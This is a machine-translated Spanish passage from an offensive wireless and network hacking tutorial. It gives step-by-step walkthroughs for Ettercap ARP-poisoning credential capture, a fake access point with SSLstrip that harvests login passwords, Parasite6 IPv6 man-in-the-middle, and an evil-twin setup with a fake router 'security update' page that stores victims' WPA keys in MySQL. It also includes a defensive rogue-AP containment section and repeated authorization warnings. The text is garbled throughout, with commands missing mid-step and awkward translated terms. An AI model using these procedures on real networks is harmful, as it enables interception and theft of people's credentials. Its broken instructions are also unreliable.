A continuación, Xplico abriría una interfaz gráfica de usuario basada en la web que requeriría
que inicie sesión con los siguientes detalles:
ÿ Usuario: xplico
Machine Translated by Google
vez que haya iniciado sesión como xplico, para analizar los datos que capturó previamente en la
interfaz de red ethernet0, debe crear un nuevo caso haciendo clic en una opción de menú: Caso
> nuevo caso > Adquisición en vivo.
Si desea analizar un archivo existente que ha guardado anteriormente, puede optar por hacer clic
en la barra de radio llamada: "Cargando archivo/s de captura PCAP"
Una vez que crea un caso, puede nombrarlo del proyecto que esté haciendo, luego puede crear
varias sesiones dentro de cada proyecto y comenzar a verlas.
Xplico proporcionará una visibilidad clara de cualquier sitio web, imágenes o videos que la víctima
haya visitado, ya sea como un formato de captura en vivo o reproduciéndolos en cualquier otra
fecha en cualquier momento.
Asimismo, podemos capturar tráfico VOIP (Voice over IP), que también podemos falsificar, borrar
o escuchar en cualquier momento en el futuro. Xplico es más que una herramienta de captura de
datos, pero debido a su poder también es conocida como una muy buena herramienta de piratería.
Machine Translated by Google
En este capítulo, discutiremos cómo usar Ettercap para capturar credenciales, específicamente
nombres de usuario y contraseñas de un objetivo que usa HTTP y FTP.
Esto es posible si el objetivo utiliza dos protocolos no cifrados, como HTTP y FTP. En la
configuración, tenemos un sistema Linux y Windows 10, y vamos a usar Ettercap para
ubicarnos en el medio entre la puerta de enlace predeterminada, que es la máquina host de
Windows.
Primero dentro de Kali Linux, vaya a "Aplicaciones", luego desplácese hacia abajo y
seleccione "Sniffing and Spoofing" y luego seleccione "Ettercap-g". Esta es la GUI para
Ettercap. Una vez que la GUI esté abierta, seleccione "olfatear" y luego seleccione "olfateo
unificado" y aparecerá la siguiente ventana.
En la nueva ventana que ahora está abierta llamada "Entrada de mayúsculas y minúsculas",
le preguntará en qué interfaz de red desea olfatear. Solo hay una NIC o tarjeta de interfaz de
red en nuestras máquinas Kali, que es lo que unifica la detección.
Por lo tanto, independientemente de la interfaz que se muestre, debe elegir esa, así que
seleccione "Aceptar". A continuación, antes de ponernos en el medio con Ettercap, tenemos
que configurar el objetivo. Para hacer esto, seleccione "hosts" y luego "buscar hosts".
Esto escaneará la subred en la que se encuentra su objetivo. Solo puede ponerse en el medio
de una subred determinada con "envenenamiento arp", que es lo que vamos a usar.
Una vez que se completó el escaneo, regrese y seleccione "hosts", luego "lista de hosts" y en
la nueva ventana, debería ver las direcciones IP que encontró el escaneo anterior.
Aquí también debe encontrar la dirección IP de su puerta de enlace predeterminada, que en
mi caso es 192.168.100.1.
Machine Translated by Google
Ahora debe crear objetivos, por lo que si hace clic en la dirección IP 192.168.100.1 o en la
dirección IP que sea su puerta de enlace predeterminada, seleccione "Agregar al objetivo 1".
A continuación, si tiene más direcciones IP en la lista, también desea apuntarlas, por lo que una
vez más, puede resaltarlas haciendo clic en ellas y luego haga clic en "Agregar al objetivo 2".
Una vez que haya seleccionado sus objetivos, vaya a la ventana superior, luego seleccione
"Mitm", esto se refiere a "hombre en el medio" y luego puede seleccionar "envenenamiento por arp".
Una vez que haya seleccionado estos, aparecerá una nueva ventana, debe marcar "Sniff remote
connections" y hacer clic en "ok"
Si está en el medio, o debería decir si la máquina Kali Linux está en el medio entre la máquina
con Windows 10 y la puerta de enlace predeterminada, la dirección MAC para la dirección IP
192.168.100.1 debería ser la dirección MAC de la máquina Kali Linux. Para verificar eso, debe
ir a la línea de comando de la máquina con Windows 10 y escribir: “arp-a”
Arp significa Protocolo de resolución de direcciones, y lo que hace es que traduce las direcciones
Mac a direcciones IP, y una vez que use ese comando en Windows, debería ver la lista de
direcciones IP y al lado de cada una de sus direcciones MAC asociadas.
Por cierto, asegúrese de no confundirse, ya que Windows hace referencia a las direcciones IP
como "Direcciones de Internet" y hace referencia a las direcciones MAC como "Direcciones
físicas".
Como ve, las "Direcciones físicas" son técnicamente incorrectas porque al usar Ettercap acaba
de cambiar la dirección Mac de su puerta de enlace predeterminada, pero para estar 100%
seguro, también puede verificar la dirección mac de Kali Linux.
"ifconfig"
Y dentro de la salida que le muestra este comando, busque el término "éter" que hace referencia
a la MAC o "dirección física" de su dirección Ethernet de Kali Linux.
Una vez que verificó y la dirección de Kali ether es la misma que la puerta de enlace
predeterminada de Windows, sabrá que está en el medio con Ettercap. Ahora el
Machine Translated by Google
Lo bueno de Ettercap es que cuando estás en el medio, todo lo que tienes que hacer es
ejecutarlo.
El usuario final nunca se da cuenta mientras usted está en el medio porque no hay un
cartel de advertencia que aparezca para el usuario, por lo que no se dará cuenta si realiza
un ataque de hombre en el medio de capa 2 con Ettercap.
Por último, le volveré a pedir que se asegure de que tiene una autorización por escrito
para usar este método en un entorno de producción o en vivo, ya que cualquier tipo de
ataque Man in the Middle es muy peligroso.
Machine Translated by Google
En este capítulo, le enseñaré cómo crear un punto de acceso falso en una máquina
virtual Kali Linux. Para completar este ataque, necesitará tener un adaptador de red USB
que admita tanto el modo monitor como el modo maestro.
Si no tiene un adaptador de red USB que admita estos modos de red, el adaptador de
red que le recomiendo es el Alpha del que hablé anteriormente. Solo cuesta alrededor
de $ 50 y puede comprar uno en Amazon y en algunos otros lugares.
Antes de comenzar, quiero explicar cómo funciona este ataque. Para ilustrarlo, déjame
darte una descripción general de alto nivel de cómo funciona este ataque. Los
componentes principales incluyen a la víctima, el atacante, el punto de acceso falso y un
enrutador con conexión a Internet.
Lo que sucede es que el atacante está conectado a Internet y compartirá esa conexión a
Internet a través de un adaptador de red USB que actúa como un punto de acceso falso.
Cuando alguien se conecte a ese punto de acceso falso, podrá acceder a Internet.
Déjame guiarte a través de este proceso. Lo primero que sucederá es que la víctima se
conectará al punto de acceso falso, luego el tráfico de Internet de la víctima se enrutará
a través del punto de acceso falso hacia el atacante.
Una vez que el atacante obtiene el tráfico de Internet de las víctimas, el atacante
manipulará y registrará el tráfico de Internet de las víctimas con la tira SSL y esto permitirá
que el atacante obligue a la víctima a usar HTTP, que como resultado también permitirá
que el atacante capturar cualquier nombre de usuario y contraseña que ingrese la víctima.
Una vez que la tira SSL haya terminado de manipular y registrar el tráfico de Internet de
las víctimas, el atacante reenviará el tráfico de Internet de las víctimas al enrutador.
Finalmente, el enrutador enrutará el tráfico de Internet de las víctimas a cualquier sitio
web con el que la víctima esté intentando comunicarse.
Lo que hacemos aquí es que nos ubicamos entre la víctima y el sitio web para que, como
consecuencia, podamos ver cualquier interacción que ocurra entre la víctima y el sitio
web, y esto también se conoce como un hombre en el -ataque medio.
Machine Translated by Google
Eso concluye la explicación, así que sigamos adelante y comencemos con el ataque.
Lo primero que debemos hacer es conectarnos a Internet, y lo lograremos
compartiendo la conexión a Internet de nuestro sistema operativo host con nuestra
máquina virtual Kali Linux.
Tenga en cuenta que puede conectarse a cualquier red que desee siempre que tenga
una conexión a Internet y, si tiene un dispositivo móvil, puede conectarse a su Android
o iPhone que use un módem USB 4G, un punto de acceso móvil o lo que sea. medio
de una conexión a Internet que tenga.
Una vez conectado a Internet en su sistema operativo host, debe compartirlo con
nuestra máquina virtual Kali Linux.
Una vez que haya realizado esa configuración, puede continuar y permitir que el
menú de la máquina virtual se colapse y ahora podemos usar esa red virtual para
establecer una conexión a Internet.
Machine Translated by Google
A continuación, abramos nuestro administrador de red, por cierto, puede usar cualquier
administrador de red que tenga, y aquí, debe encontrar la opción que dice "Red cableada"
y luego hacer clic en "conectar".
Sigamos y cerremos el administrador de red, y abramos una terminal donde debe escribir:
"espacio de ruta -n" y luego presione ENTER, y siga adelante y busque la dirección IP de
Puede abrir un bloc de notas o, si lo desea, puede usar una hoja de papel que sea
conveniente para usted y escribir la dirección IP de su puerta de enlace. Ahora que hemos
tomado nota de la dirección IP de nuestra puerta de enlace, necesitamos instalar el servidor DHCP.
paciente y permita suficiente tiempo para terminar de instalar el servidor DHCP, y una vez
que la instalación esté completa, debemos configurar nuestro servidor DHCP.
"autoritario;
Arriba después del espacio, se llama "corchete rizado orientado hacia adelante" y luego presione
ENTER, y baje una línea y luego escriba;
enrutadores opcionales
y luego presione ENTER para bajar una línea y luego ingrese un corchete que mira hacia atrás.
Eso es todo lo que necesitamos para entrar. Una vez más, su configuración debería verse así:
autoritario;
tiempo de arrendamiento
predeterminado 600; tiempo
máximo de arrendamiento 7200; subred 192.168.1.0
máscara de red 255.255.255.0 { opción enrutadores
192.168.1.1; opción máscara de subred 255.255.255.0;
opción nombre de dominio “freewifi”; opción
servidores de nombres de dominio 192.168.1.1; rango
192.168.1.2 192.168.1.30;
Machine Translated by Google
A continuación, debe guardar los cambios que hemos realizado, así que presione las teclas
"ctrl + x" y luego para guardar el archivo. Debe presionar la tecla "Y" y luego escribir el archivo
y cerrarlo.
"airmon-ng" y
para usted. Aparecerá un mensaje para decir que se ha creado una interfaz de monitor y se
llama "mon0".
Ahora necesitamos crear nuestro punto de acceso falso, así que escribamos;
Para “mon0” debe ingresar el nombre de la interfaz de su monitor. En el caso mío, es "mon0",
luego presione enter y ahora que nuestro punto de acceso falso está en funcionamiento,
debemos hacer algunos ajustes en nuestra interfaz de túnel, que es una interfaz que "airbase"
creó automáticamente para nosotros cuando iniciamos nuestro punto de acceso falso. .
Por lo tanto, abramos una nueva terminal, pero no cerremos la terminal en la que estamos
ejecutando una base aérea, porque la necesitamos para continuar operando. En la nueva
terminal, vamos a escribir; "ifconfig at0 192.168.1.1 máscara de red 255.255.255.0" y luego
presione enter. Ahora necesitamos ajustar la MTU, que significa unidades máximas de
transmisión. Lo que hace MTU es que permite que nuestra interfaz de túnel transmita paquetes
más grandes para que podamos evitar la fragmentación de paquetes.
En términos más simples, esto permite que nuestro punto de acceso falso administre mayores
Machine Translated by Google
volúmenes de tráfico de Internet, que es generado por cualquiera que se conecte a nuestro punto de acceso
falso. En la terminal, escribamos;
y luego presione Entrar. Ahora necesitamos agregar una tabla de enrutamiento, así que escribamos;
y luego presione Entrar. Ahora necesitamos habilitar el reenvío de IP y crear algunas reglas de tablas de IP
para que podamos usar nuestra interfaz de túnel para enrutar el tráfico entre nuestro punto de acceso falso y
nuestra fuente de Internet. Por lo tanto, necesitamos escribir; “echo 1 > /proc/sys/net/ipv4/ip_forward” y luego
presione Enter. Ahora necesitamos ingresar las reglas de nuestras tablas de IP, así que escribamos; "iptables
Aquí, debemos ingresar la dirección IP de la puerta de enlace que anotamos anteriormente, y la mía es
192.168.0.1, luego presione ENTER. Ahora tenemos que escribir; "iptables -P ADELANTE ACEPTAR"
Las palabras reenviar y aceptar deben escribirse en mayúsculas y luego presionar ENTER. Ahora tenemos
que escribir; “iptables --append FORWARD – in-interface at0 -j ACCEPT” y luego presione Enter. Ahora
presione Enter. Ahora que hemos creado nuestras reglas de iptables, debemos iniciar nuestro servidor DHCP.
Así que escribamos;
debería decir:
Por último, pero no menos importante, debemos comenzar a editar la aplicación, así que abramos
una nueva terminal pero no cerremos la terminal en la que estamos ejecutando una tira de SSL.
En la nueva terminal vamos a escribir; "ettercap -p -U -T -q -i at0"
y luego presione Entrar. Ahora que tenemos SSL strip y ethercap ejecutándose, hemos terminado
de configurar el ataque. Ahora podemos simular una víctima para que podamos usar nuestro
punto de acceso falso para capturar algunos nombres de usuario y contraseñas.
Continúe y conéctese y suponiendo que configuramos todo correctamente, debería tener una
conexión a Internet. Verifique y vea si tiene una dirección IP asignada del grupo de DHCP que
hemos creado anteriormente.
En el ejemplo que he proporcionado, hemos creado un servidor DHCP que puede asignar
direcciones IP a los dispositivos conectados, y hemos creado un rango entre 192.168.1.2 y
192.168.1.30 con el comando
Puedes usar Firefox o Google Chrome, y verás que si intentas escribir en el navegador https://
www.facebook.com, cambiará la dirección a www.facebook.com
Esto significa que la franja SSL está funcionando y si observa la pestaña superior izquierda del
navegador, verá un icono de candado.
Este es un ícono que SSL strip coloca allí para agregar un poco de legitimidad y esto evita que la
víctima sospeche demasiado, porque ven este candado y automáticamente asumen que debe ser
seguro.
utilice un nombre de usuario y una contraseña ficticios, como "testuser" y utilice la contraseña
"password123".
No importa qué nombre de usuario o contraseña uses, ya que el objetivo no es que inicies sesión
en Facebook, sino el hecho de que podemos capturar las credenciales del nombre de usuario y la
contraseña.
Antes de hacer clic en iniciar sesión, vuelva a la máquina del atacante y monitoreemos en la
terminal de ettercap. Ahora puede seguir adelante y hacer clic en iniciar sesión en Facebook, y si
mira la terminal de Ettercap, debería ver los datos que llegan.
Debe observar tanto el nombre de usuario junto al campo "USUARIO" como la contraseña junto
al "PASS" archivado.
Si probara el ejemplo con un sitio web de banca en línea, es muy probable que el nombre de
usuario y la contraseña no aparezcan en el terminal de Ettercap, pero aparecerán en los registros
de tiras de SSL.
Puede intentar iniciar sesión en las cuentas y no verá el nombre de usuario y la contraseña en la
terminal, pero la tira SSL los tomará y los colocará en un registro.
Entonces, continúe y regrese a la computadora del atacante, y aquí debe abrir una nueva terminal
y escribir;
"cat sslstrip.log"
y luego presione Entrar. Ahora, debería ver tanto el nombre de usuario como la contraseña.
Los detalles del usuario aparecerán en los registros como "userId=username" y la contraseña
aparecerá como "auth_passwd=password"
Esos son todos los ejemplos que quería compartir contigo pero ten en cuenta que este ataque es
expandible.
Por ejemplo, existe una herramienta llamada "karma" y lo que hace es que cuando una
computadora busca una red inalámbrica para conectarse específicamente a una red inalámbrica
a la que se conectó en el pasado, envía solicitudes de sondeo.
Bueno, podemos crear algo que nos permita aceptar esas solicitudes de sondeo y luego falsificar
la red inalámbrica que la persona está buscando.
Cuando responda, pensarán que encontraron esa red inalámbrica y su computadora se conectará
automáticamente. Hay muchas cosas
Machine Translated by Google
puedes hacerlo con esto, pero por ahora es hora de pasar al siguiente ataque.
Puede cerrar la terminal que usamos para ver el registro de strip de SSL. Luego, para
detener ettercap, deberá presionar las teclas ctrl y C y luego podrá cerrar esa terminal.
Luego, para detener la tira SSL, puede presionar ctrl + C para cerrar la terminal. Para
detener su punto de acceso falso, también presione ctrl + C en la ventana de kali y luego
cierre la terminal.
Todas las reglas de iptables que hemos creado se restaurarán automáticamente a sus
valores predeterminados cuando reinicie su máquina virtual.
Asegúrese de tener una autorización por escrito antes de usar SSLstrip, incluidas las
variaciones relacionadas con esta herramienta. Si solo está practicando en el laboratorio
de su casa, en un entorno que no sea de producción, eso no debería causar ningún
problema a nadie; aún así, te sugiero que apagues tu enrutador y practiques con cuidado
sin ninguna conexión a Internet.
Machine Translated by Google
Scapy puede ayudarlo a crear prácticamente cualquier paquete que desee, sin ningún
problema. Imagínese que está a punto de administrar y validar una configuración en un
Firewall, y una de las políticas dicta que implemente la siguiente regla: “Cualquier paquete
iniciado desde la dirección de entrada a la dirección de salida no está permitido, por lo que
Esta solicitud de regla de firewall, por supuesto, tiene mucho sentido, pero también suena un
poco poco realista. Solo piense en cómo es posible que una PC envíe una solicitud desde su
propia dirección IP a la dirección de salida donde la dirección IP de destino sería exactamente
la misma dirección IP que la PC del remitente.
Alguien puede estar a punto de ejecutar un escaneo de puertos dentro de la organización para
obtener datos sobre los dispositivos de red y sus vulnerabilidades para lanzar un ataque
estratégico, que podría dañar, deshabilitar, clonar o incluso apagar todo el sistema, y parecería
que fue se originó desde el interior de la red privada.
Con Scapy, al abrir la interfaz de línea de comandos, podemos iniciarlo y crear un paquete, y
la mejor parte es que podemos especificar prácticamente cualquier cosa:
Luego presiona enter. Debido a que hay tantas posibilidades con scapy, comencemos
con algo sencillo y sería un comando de envío básico:
Además, quiero que este paquete se vea como una solicitud de eco ICMP, pero quiero
que incluya un Payload llamado OurPayload. Scapy es un rompedor de reglas.
Por lo tanto, no tenemos que hacer nada exactamente como debe ser según los
protocolos de red adecuados, sino que podemos crear paquetes que lógicamente
nunca se encontrarían en la red.
Luego presiona enter. Otro comando que es muy peligroso, es cuando giramos
Machine Translated by Google
Luego presione enter, esto significa que quiero que detecte todo el tráfico que pasa a través
de la interfaz ethernet0, y quiero que muestre cada paquete a medida que entra y pasa a
través de usted.
Después de presionar enter, la salida probablemente llenará este libro; pero quería compartir
con ustedes que Scapy no solo es capaz de crear paquetes, sino que también puede
convertirse en un intruso o un rastreador si así lo deseamos.
Por último, le pediré nuevamente que se asegure de tener una autorización por escrito para
usar Scapy en un entorno real o de producción.
Hay muchas técnicas diferentes para contener un punto de acceso no autorizado en una red
inalámbrica y en este escenario; vamos a utilizar WLC para hacerlo. Pero antes de pensar en
contener un punto de acceso no autorizado, primero debemos identificarlo. Una vez más, hay
varias formas de identificar un punto de acceso no autorizado, y ya discutimos algunas de
ellas, así que imagine el siguiente escenario.
Imagine que está utilizando un analizador de canales para identificar posibles fuentes de
interferencia, en un entorno en el que se transmiten varios SSID, pero uno de ellos utiliza una
autenticación abierta, mientras que el resto de los SSID utilizan WPA2-Enterprise for Security.
Bueno, es muy probable que si se trata de una infraestructura corporativa, lo que estaríamos
viendo es algún punto de acceso que es un dispositivo no autorizado que está tratando de atraer
algunos clientes.
En segundo lugar, si tenemos un cliente que se asocia con este punto de acceso no autorizado
y comienza a usarlo, entonces el atacante que tiene ese punto de acceso no autorizado ahora
puede realizar un ataque de intermediario y espiar todo el tráfico.
Así que esto es lo que vamos a hacer. Vamos a utilizar un controlador de LAN inalámbrica
también conocido como "WLC" porque el WLC sabe exactamente qué puntos de acceso
administra.
Lo bueno es que estos puntos de acceso no están sentados de forma predeterminada sirviendo
a sus clientes en sus respectivos canales, sino que también escanean periódicamente los otros
canales, recopilando información que envían al controlador de LAN inalámbrica.
Parte de esa información que recopila es información sobre los puntos de acceso que ven.
Cuando el controlador de LAN inalámbrica ve un punto de acceso que no administra, no es
parte de la familia de controladores inalámbricos, clasificará ese punto de acceso como "falso".
Por lo tanto, nuestro primer paso dentro del WLC es echar un vistazo y ver si el controlador
conoce algún punto de acceso no autorizado, y después de encontrar ese acceso
Machine Translated by Google
Si usa un WLC, es posible que vea varios dispositivos enumerados allí y pregunte; Bueno,
¿cómo es que hay tantos puntos de acceso no autorizados? Puede haber varias razones
para esto. Por ejemplo, su WLC puede ver 10 o incluso más puntos de acceso no
autorizados, y es posible que todos sean completamente legítimos, es solo que su WLC
no los está administrando, por lo tanto, los clasifica como no autorizados.
Todos esos otros SSID transmitidos que están siendo vistos por uno o más de esos
puntos de acceso que administra el WLC y se informan al controlador y es por eso que el
controlador los coloca en la categoría de pícaro.
Simplemente no sabe quiénes son esos dispositivos. Para echar un vistazo a los detalles
de estos puntos de acceso no autorizados, simplemente hacemos clic en el enlace
"detalle" y lo que vamos a ver es la lista de puntos de acceso, incluidas sus direcciones
MAC, SSID, canales que están usando, cuántos radios que están usando, cuántos
clientes están conectados a ellos.
Para obtener más información sobre el dispositivo, podemos hacer clic en su dirección
mac y nos llevará a la ventana "Rouge AP Detail". Aquí, si observamos los detalles de
ese punto de acceso, podemos ver la dirección MAC del dispositivo, la primera vez que
fue visto por el WLC, la última vez fue informada al WLC, y abajo, cerca de la parte
inferior, están los puntos de acceso que se reportan en primer lugar.
Allí, podemos ver que el AP o los AP informan que vieron el punto de acceso no autorizado
en qué canal y también incluyen información como un indicador de intensidad de la señal
de recepción y la relación señal-ruido.
Ahora te estarás preguntando; bueno, eso es genial y sabemos que tenemos un punto de
acceso no autorizado, pero ¿cómo contenemos ese dispositivo, cómo lo apagamos?
Bueno, vamos a tomar nuestros puntos de acceso que, además de admitir a los clientes
normales, también van a dedicar un poco de tiempo adicional a los que actualmente
pueden ver ese punto de acceso no autorizado y van a realizar de manera efectiva un
ataque de denegación de servicio. contra ese punto de acceso.
Machine Translated by Google
Atacar su propio punto de acceso no es un gran problema, sin embargo, debo señalar que
atacar la red de área local inalámbrica de otra persona es un gran problema y
definitivamente nunca querrá hacer eso contra ninguna otra red legítima, porque causará
un ataque de denegación de servicio contra esa red.
Entonces, para hacer eso mirando los detalles del AP no autorizado, todo lo que tenemos
que hacer es ir a "actualizar estado" y cambiar a "contener" en lugar de "alerta". A
continuación, la pregunta es cuántos puntos de acceso debemos usar para seguir adelante
y lidiar con esa contención.
La contención se puede definir bajo el título; “Número máximo de Aps para contener al
pícaro” Aquí, si solo tiene un punto de acceso que actualmente puede ver el dispositivo
pícaro, solo puede seleccionar uno para enviar los mensajes de “desautenticación”.
Una vez seleccionado, haga clic en "aplicar" para hacer ese cambio y le dará una pequeña
advertencia diciendo; “Puede haber problemas legales después de esta contención. ¿Estás
Como señalé anteriormente, esto podría ser ilegal, pero si es el propietario del punto de
acceso, puede hacer clic en "Aceptar". Ahora, ocurrirá un "ataque de desautenticación"
contra ese punto de acceso no autorizado, y permanecerá en su lugar hasta que lo
apaguemos.
Aunque parece que la dirección MAC de origen está involucrada, estos están siendo
iniciados por nuestros propios puntos de acceso para realizar un ataque. Si continúa
siguiendo ese flujo, vaya más abajo, continuará una y otra vez hasta que detengamos
el ataque al WLC.
El objetivo es asegurarse de que ningún cliente válido se asocie accidentalmente
con el punto de acceso no autorizado o, si lo hacen, no permanecerán allí mucho
tiempo debido a los mensajes periódicos de "desautenticación" que llegan y que
desasociarán a los clientes conectados. eso.
Imagine que tiene una nueva asignación para pruebas de penetración, y la empresa tiene
dos redes que requieren ser violadas. Sin embargo, es muy probable que uno de ellos
sea fácil ya que no hay firewalls en su lugar.
Pero la segunda red parece más segura y podría tomar todo el día descubrir la posible
volnaribilidad para explotarla. Ciertas personas pueden comenzar con el fácil que se
puede hacer en menos de una hora.
Pero, si hace las preguntas correctas a la implementación de red actual que se está
ejecutando dentro de la empresa, puede ahorrarse un dolor de cabeza adicional y tener
un día fácil.
IPv6 se ejecuta como un protocolo válido en la mayoría de las computadoras en las empresas de hoy.
Por lo tanto, al tomar ciertas medidas para deshabilitarlo, podría aprovechar IPv6 de
acuerdo con su funcionamiento y comprometer la red mediante un ataque Man in the
Middle.
Si está al tanto de eso y sabe cómo descifrarlo, es posible que pueda terminar su prueba
de penetración en un corto período de tiempo, ya que es posible que la empresa no haya
habilitado todas las funciones de seguridad en la red como debería.
El ataque Man in the Middle se puede lograr con muchas herramientas y ya hemos
discutido algunas de ellas anteriormente. Una vez que nos estamos acercando a una red
IPv6, podemos usar otra gran herramienta llamada "Parasite6".
En este caso, una dirección IPv6 del enrutador que está en la misma red, o si hay un
servidor DHCP, entonces el servidor DHCP asignaría esa dirección IP a esa PC.
Luego, si esa PC comienza a comunicarse con la red externa o Internet, primero debe
aprender la dirección Mac del enrutador, y eso sucedería usando ARP o Protocolo de
resolución de direcciones, pero en IPv6 no existe tal cosa como ARP.
Para convertir este ataque DoS en un ataque MITM, tendríamos que activar el
reenvío de IPv6 en nuestra máquina Kali Linux.
Lanzar Parasite6 en Kali es simple, todo lo que tiene que hacer es escribir el
comando:
Para la dirección mac falsa, cualquier dirección mac inventada funcionaría bien.
Otros comandos útiles que puede
implementar son: "parasite6 -l interface1 (falsa
dirección mac)" Esta vez agregué "–l" y eso representaría un bucle, lo que significa
que crearía un bucle y actualizaría el mensaje de solicitud cada 5 segundos. en
Machine Translated by Google
comenzaría a responder a todos ellos con su propia dirección falsa que hemos
especificado.
Asegúrese de tener una autorización por escrito antes de usar Parasite6, incluidas las
variaciones relacionadas con Parasite6, ya que podría causar un daño grave a todos
los dispositivos de red que están conectados a la red.
Si solo está practicando en el laboratorio de su casa, en un entorno que no sea de
producción, eso no debería causar ningún problema a nadie; aún así, te sugiero que
apagues tu enrutador y practiques con cuidado sin ninguna conexión a Internet.
Machine Translated by Google
Continúe y abra su administrador de red y luego busque una red inalámbrica para
conectarse. Puede conectarse a su red doméstica, así que una vez hecho esto, ahora
que está conectado a Internet en su sistema operativo host, debemos compartirlo con
nuestra máquina virtual Kali Linux.
Por lo tanto, volvamos a Kali Linux y en la barra de menú superior necesitamos abrir el
menú de la máquina virtual y luego expandiremos el menú del adaptador de red, y aquí
debemos configurar nuestro adaptador de red para detección automática en puente.
Una vez que haya realizado esa configuración, puede continuar y permitir que el menú de
la máquina virtual se colapse y ahora podemos usar ese adaptador de red virtual para
establecer una conexión a Internet a través de nuestro sistema operativo host.
Ahora que tenemos una conexión a Internet, necesitamos instalar un servidor DHCP y
para aquellos de ustedes que no saben qué es un servidor DHCP, bueno, un servidor
DHCP se usa para asignar una dirección IP dentro de un rango específico a los clientes
que se conectan a un punto de acceso.
En este caso, lo usaremos para asignar una dirección IP a cualquier persona que se
conecte a nuestro punto de acceso del gemelo malvado. Continúe y cierre su administrador
de red y ahora necesitamos abrir una terminal y en la terminal vamos a escribir;
y luego presione ENTRAR. Ya instalé el servidor DHCP, pero es posible que reciba un
mensaje que le solicite que confirme la instalación, así que simplemente escriba "Y", que
significa "sí", y luego presione Entrar, y espere un momento para terminar la instalación.
y luego presione ENTER para moverse hacia abajo a la siguiente línea y luego escriba; “tiempo de
luego presione ENTER para bajar una línea y escribir; “opción servidores de
nombres de dominio 8.8.8.8;” y luego presione ENTER para bajar una línea y
escribir;
y luego presione ENTER para bajar una línea y escribir; luego escriba un
corchete al revés; }
y eso es todo lo que necesitamos ingresar, ahora debemos guardar y cerrar el archivo. Pero antes de hacerlo,
compruebe que tiene la siguiente configuración en su terminal;
autoritario; tiempo
tiempo máximo de
arrendamiento 7200; subred 192.168.1.128 máscara de red
255.255.255.128 { opción máscara de subred 255.255.255.128;
opción dirección de difusión 192.168.1.255; enrutadores
opcionales 192.168.1.129; opción servidores de nombres de
dominio 8.8.8.8; rango 192.168.1.130 192.168.1.140; }
Una vez que haya verificado que su configuración es correcta, avancemos y guardemos esta
configuración.
Primero vamos a presionar las teclas “ctrl y X” juntas, luego presionaremos la tecla “Y”, y finalmente
presionaremos la tecla Enter. Ahora necesitamos descargar la página de actualización de seguridad
que el cliente verá cuando abra su navegador web.
Esta página web de muestra imita una actualización de seguridad para un enrutador Linksys, pero
en una prueba de penetración del mundo real, la página de muestra que estoy usando probablemente
sea irrelevante si está probando con una empresa que usa un portal cautivo o una página de destino.
Por ejemplo, le gustaría implementar una página web que se asemeje al portal cautivo de esa
empresa. Si está realizando una prueba de penetración en una red que utiliza Netgear, D-link o
Cisco, desea producir una página web que se identifique con esos fabricantes en particular.
Una vez que haya descargado el archivo zip del gemelo malvado, también debe descomprimirlo.
Una vez completado, estamos listos para iniciar nuestro servidor web Apache que nos permitirá alojar
nuestra página web de actualización de seguridad. Ahora tenemos que escribir;
“/etc/init.d/apache2 inicio”
y luego presione enter y ahora necesitamos iniciar My SQL, así que escribamos;
“/etc/init.d/mysql inicio”
y luego presione Enter y ahora que My SQL se está ejecutando, debemos iniciar sesión y crear una
base de datos que es donde almacenaremos la contraseña WPA que nuestro cliente ingresa en la
página de actualización de seguridad, así que escribamos; “mysql –u raíz”
Machine Translated by Google
y luego presione Entrar, y debería tener el indicador de MySQL. Aquí, vamos a crear una base
de datos llamada "gemelo malvado", así que escribamos;
y luego presione ENTER, y ahora necesitamos crear una tabla con algunas columnas que
representarán los datos que el cliente ingresa en el campo de contraseña en nuestra página
de actualización de seguridad. Entonces, para pasar a nuestra nueva base de datos, debemos
escribir;
"usar evil_twin"
en caso de que se lo pregunte, ese comando creó una tabla llamada "wpa_keys" que contiene
dos columnas. Uno se llama "contraseña" y el otro se llama "confirmar".
Por lo tanto, abramos una nueva terminal y podemos dejar abierta la terminal My SQL porque
accederemos a ella más adelante. En la nueva terminal necesitamos teclear;
"espacio ip"
Abra un bloc de notas en blanco para realizar un seguimiento de esta información y siga
adelante y represente estos elementos de la manera que le muestro para que podamos
consultarlos fácilmente más adelante sin confusión.
Ahora que hemos tomado nota de esa información, necesitamos encontrar el nombre de
la interfaz de nuestros adaptadores de red USB. Así que continúe y conecte su adaptador
de red USB si aún no lo ha hecho, y luego regresemos a la terminal. En la terminal
necesitamos teclear;
“Airmon-ng”
y ahora vamos a usar "airodump" para encontrar la red inalámbrica que queremos clonar,
pero primero voy a compartir con ustedes algo que nos permitirá identificar el tipo de
enrutador que está usando la red de destino.
Continuando, sigamos adelante y comencemos nuestro escaneo. Para hacer esto, necesitamos escribir;
Machine Translated by Google
presione enter, y cuando encuentre la red inalámbrica a la que desea apuntar, debe presionar las
teclas "ctrl y C" para detener el escaneo. Ahora debemos tomar nota de los objetivos "ESSID", el
número de canal al que se hace referencia como "CH" y los objetivos "BSSID".
Por lo tanto, regresemos a su bloc de notas, y vamos a llamar a estos elementos "Target ESSID",
"Target Channel Number" y "Target BSSID", así que continúe, consulte su terminal y escriba estos
detalles de la siguiente manera:
Con respecto al ESSID, asegúrese de usar mayúsculas y minúsculas según sea necesario y luego
escriba el número de canal donde el mío usa 6 y luego para el BSSID, recomiendo simplemente
copiar y pegar para asegurarse de no cometer ningún error.
Para copiar texto desde el terminal Kali sin hacer clic con el botón derecho, simplemente puede
presionar las teclas "ctrl shift + C" para copiar cualquier texto. Al igual que si desea pegar texto,
puede presionar las teclas "ctrl shift + V".
Una vez que haya pegado esta información en el bloc de notas, ahora que tenemos la información
de nuestros objetivos, podemos crear un gemelo malvado. Así que volvamos a la terminal y ahora
tenemos que escribir; “airbase-ng –e freewifi –c 6 –P mon0”
Aquí, está haciendo referencia al ESSID de los objetivos, luego al número de canal de los objetivos,
que en mi caso es 6, y luego ingresa el nombre de la interfaz de su monitor, donde puede ver que
el mío es "mon0" y luego presiona Enter.
Ahora que nuestro punto de acceso del gemelo malvado está en funcionamiento, necesitamos
configurar nuestra interfaz de túnel para poder crear un puente entre nuestro punto de acceso del
gemelo malvado y nuestra interfaz cableada.
Así que sigamos adelante y abramos una nueva terminal, pero no cierre la terminal de la base aérea
ni la terminal My SQL. En la terminal necesitamos teclear; "ifconfig at0 192.168.1.129 máscara de
red 255.255.255.128"
Machine Translated by Google
Y luego presione enter. Ahora necesitamos agregar una tabla de enrutamiento y habilitar el
reenvío de IP para que podamos reenviar el tráfico hacia y desde nuestro punto de acceso
gemelo malvado, así que escribamos; "ruta agregar -net 192.168.1.128 máscara de red
255.255.255.128 gw 192.168.1.129" y luego presione enter. Ahora tenemos que escribir; “eco
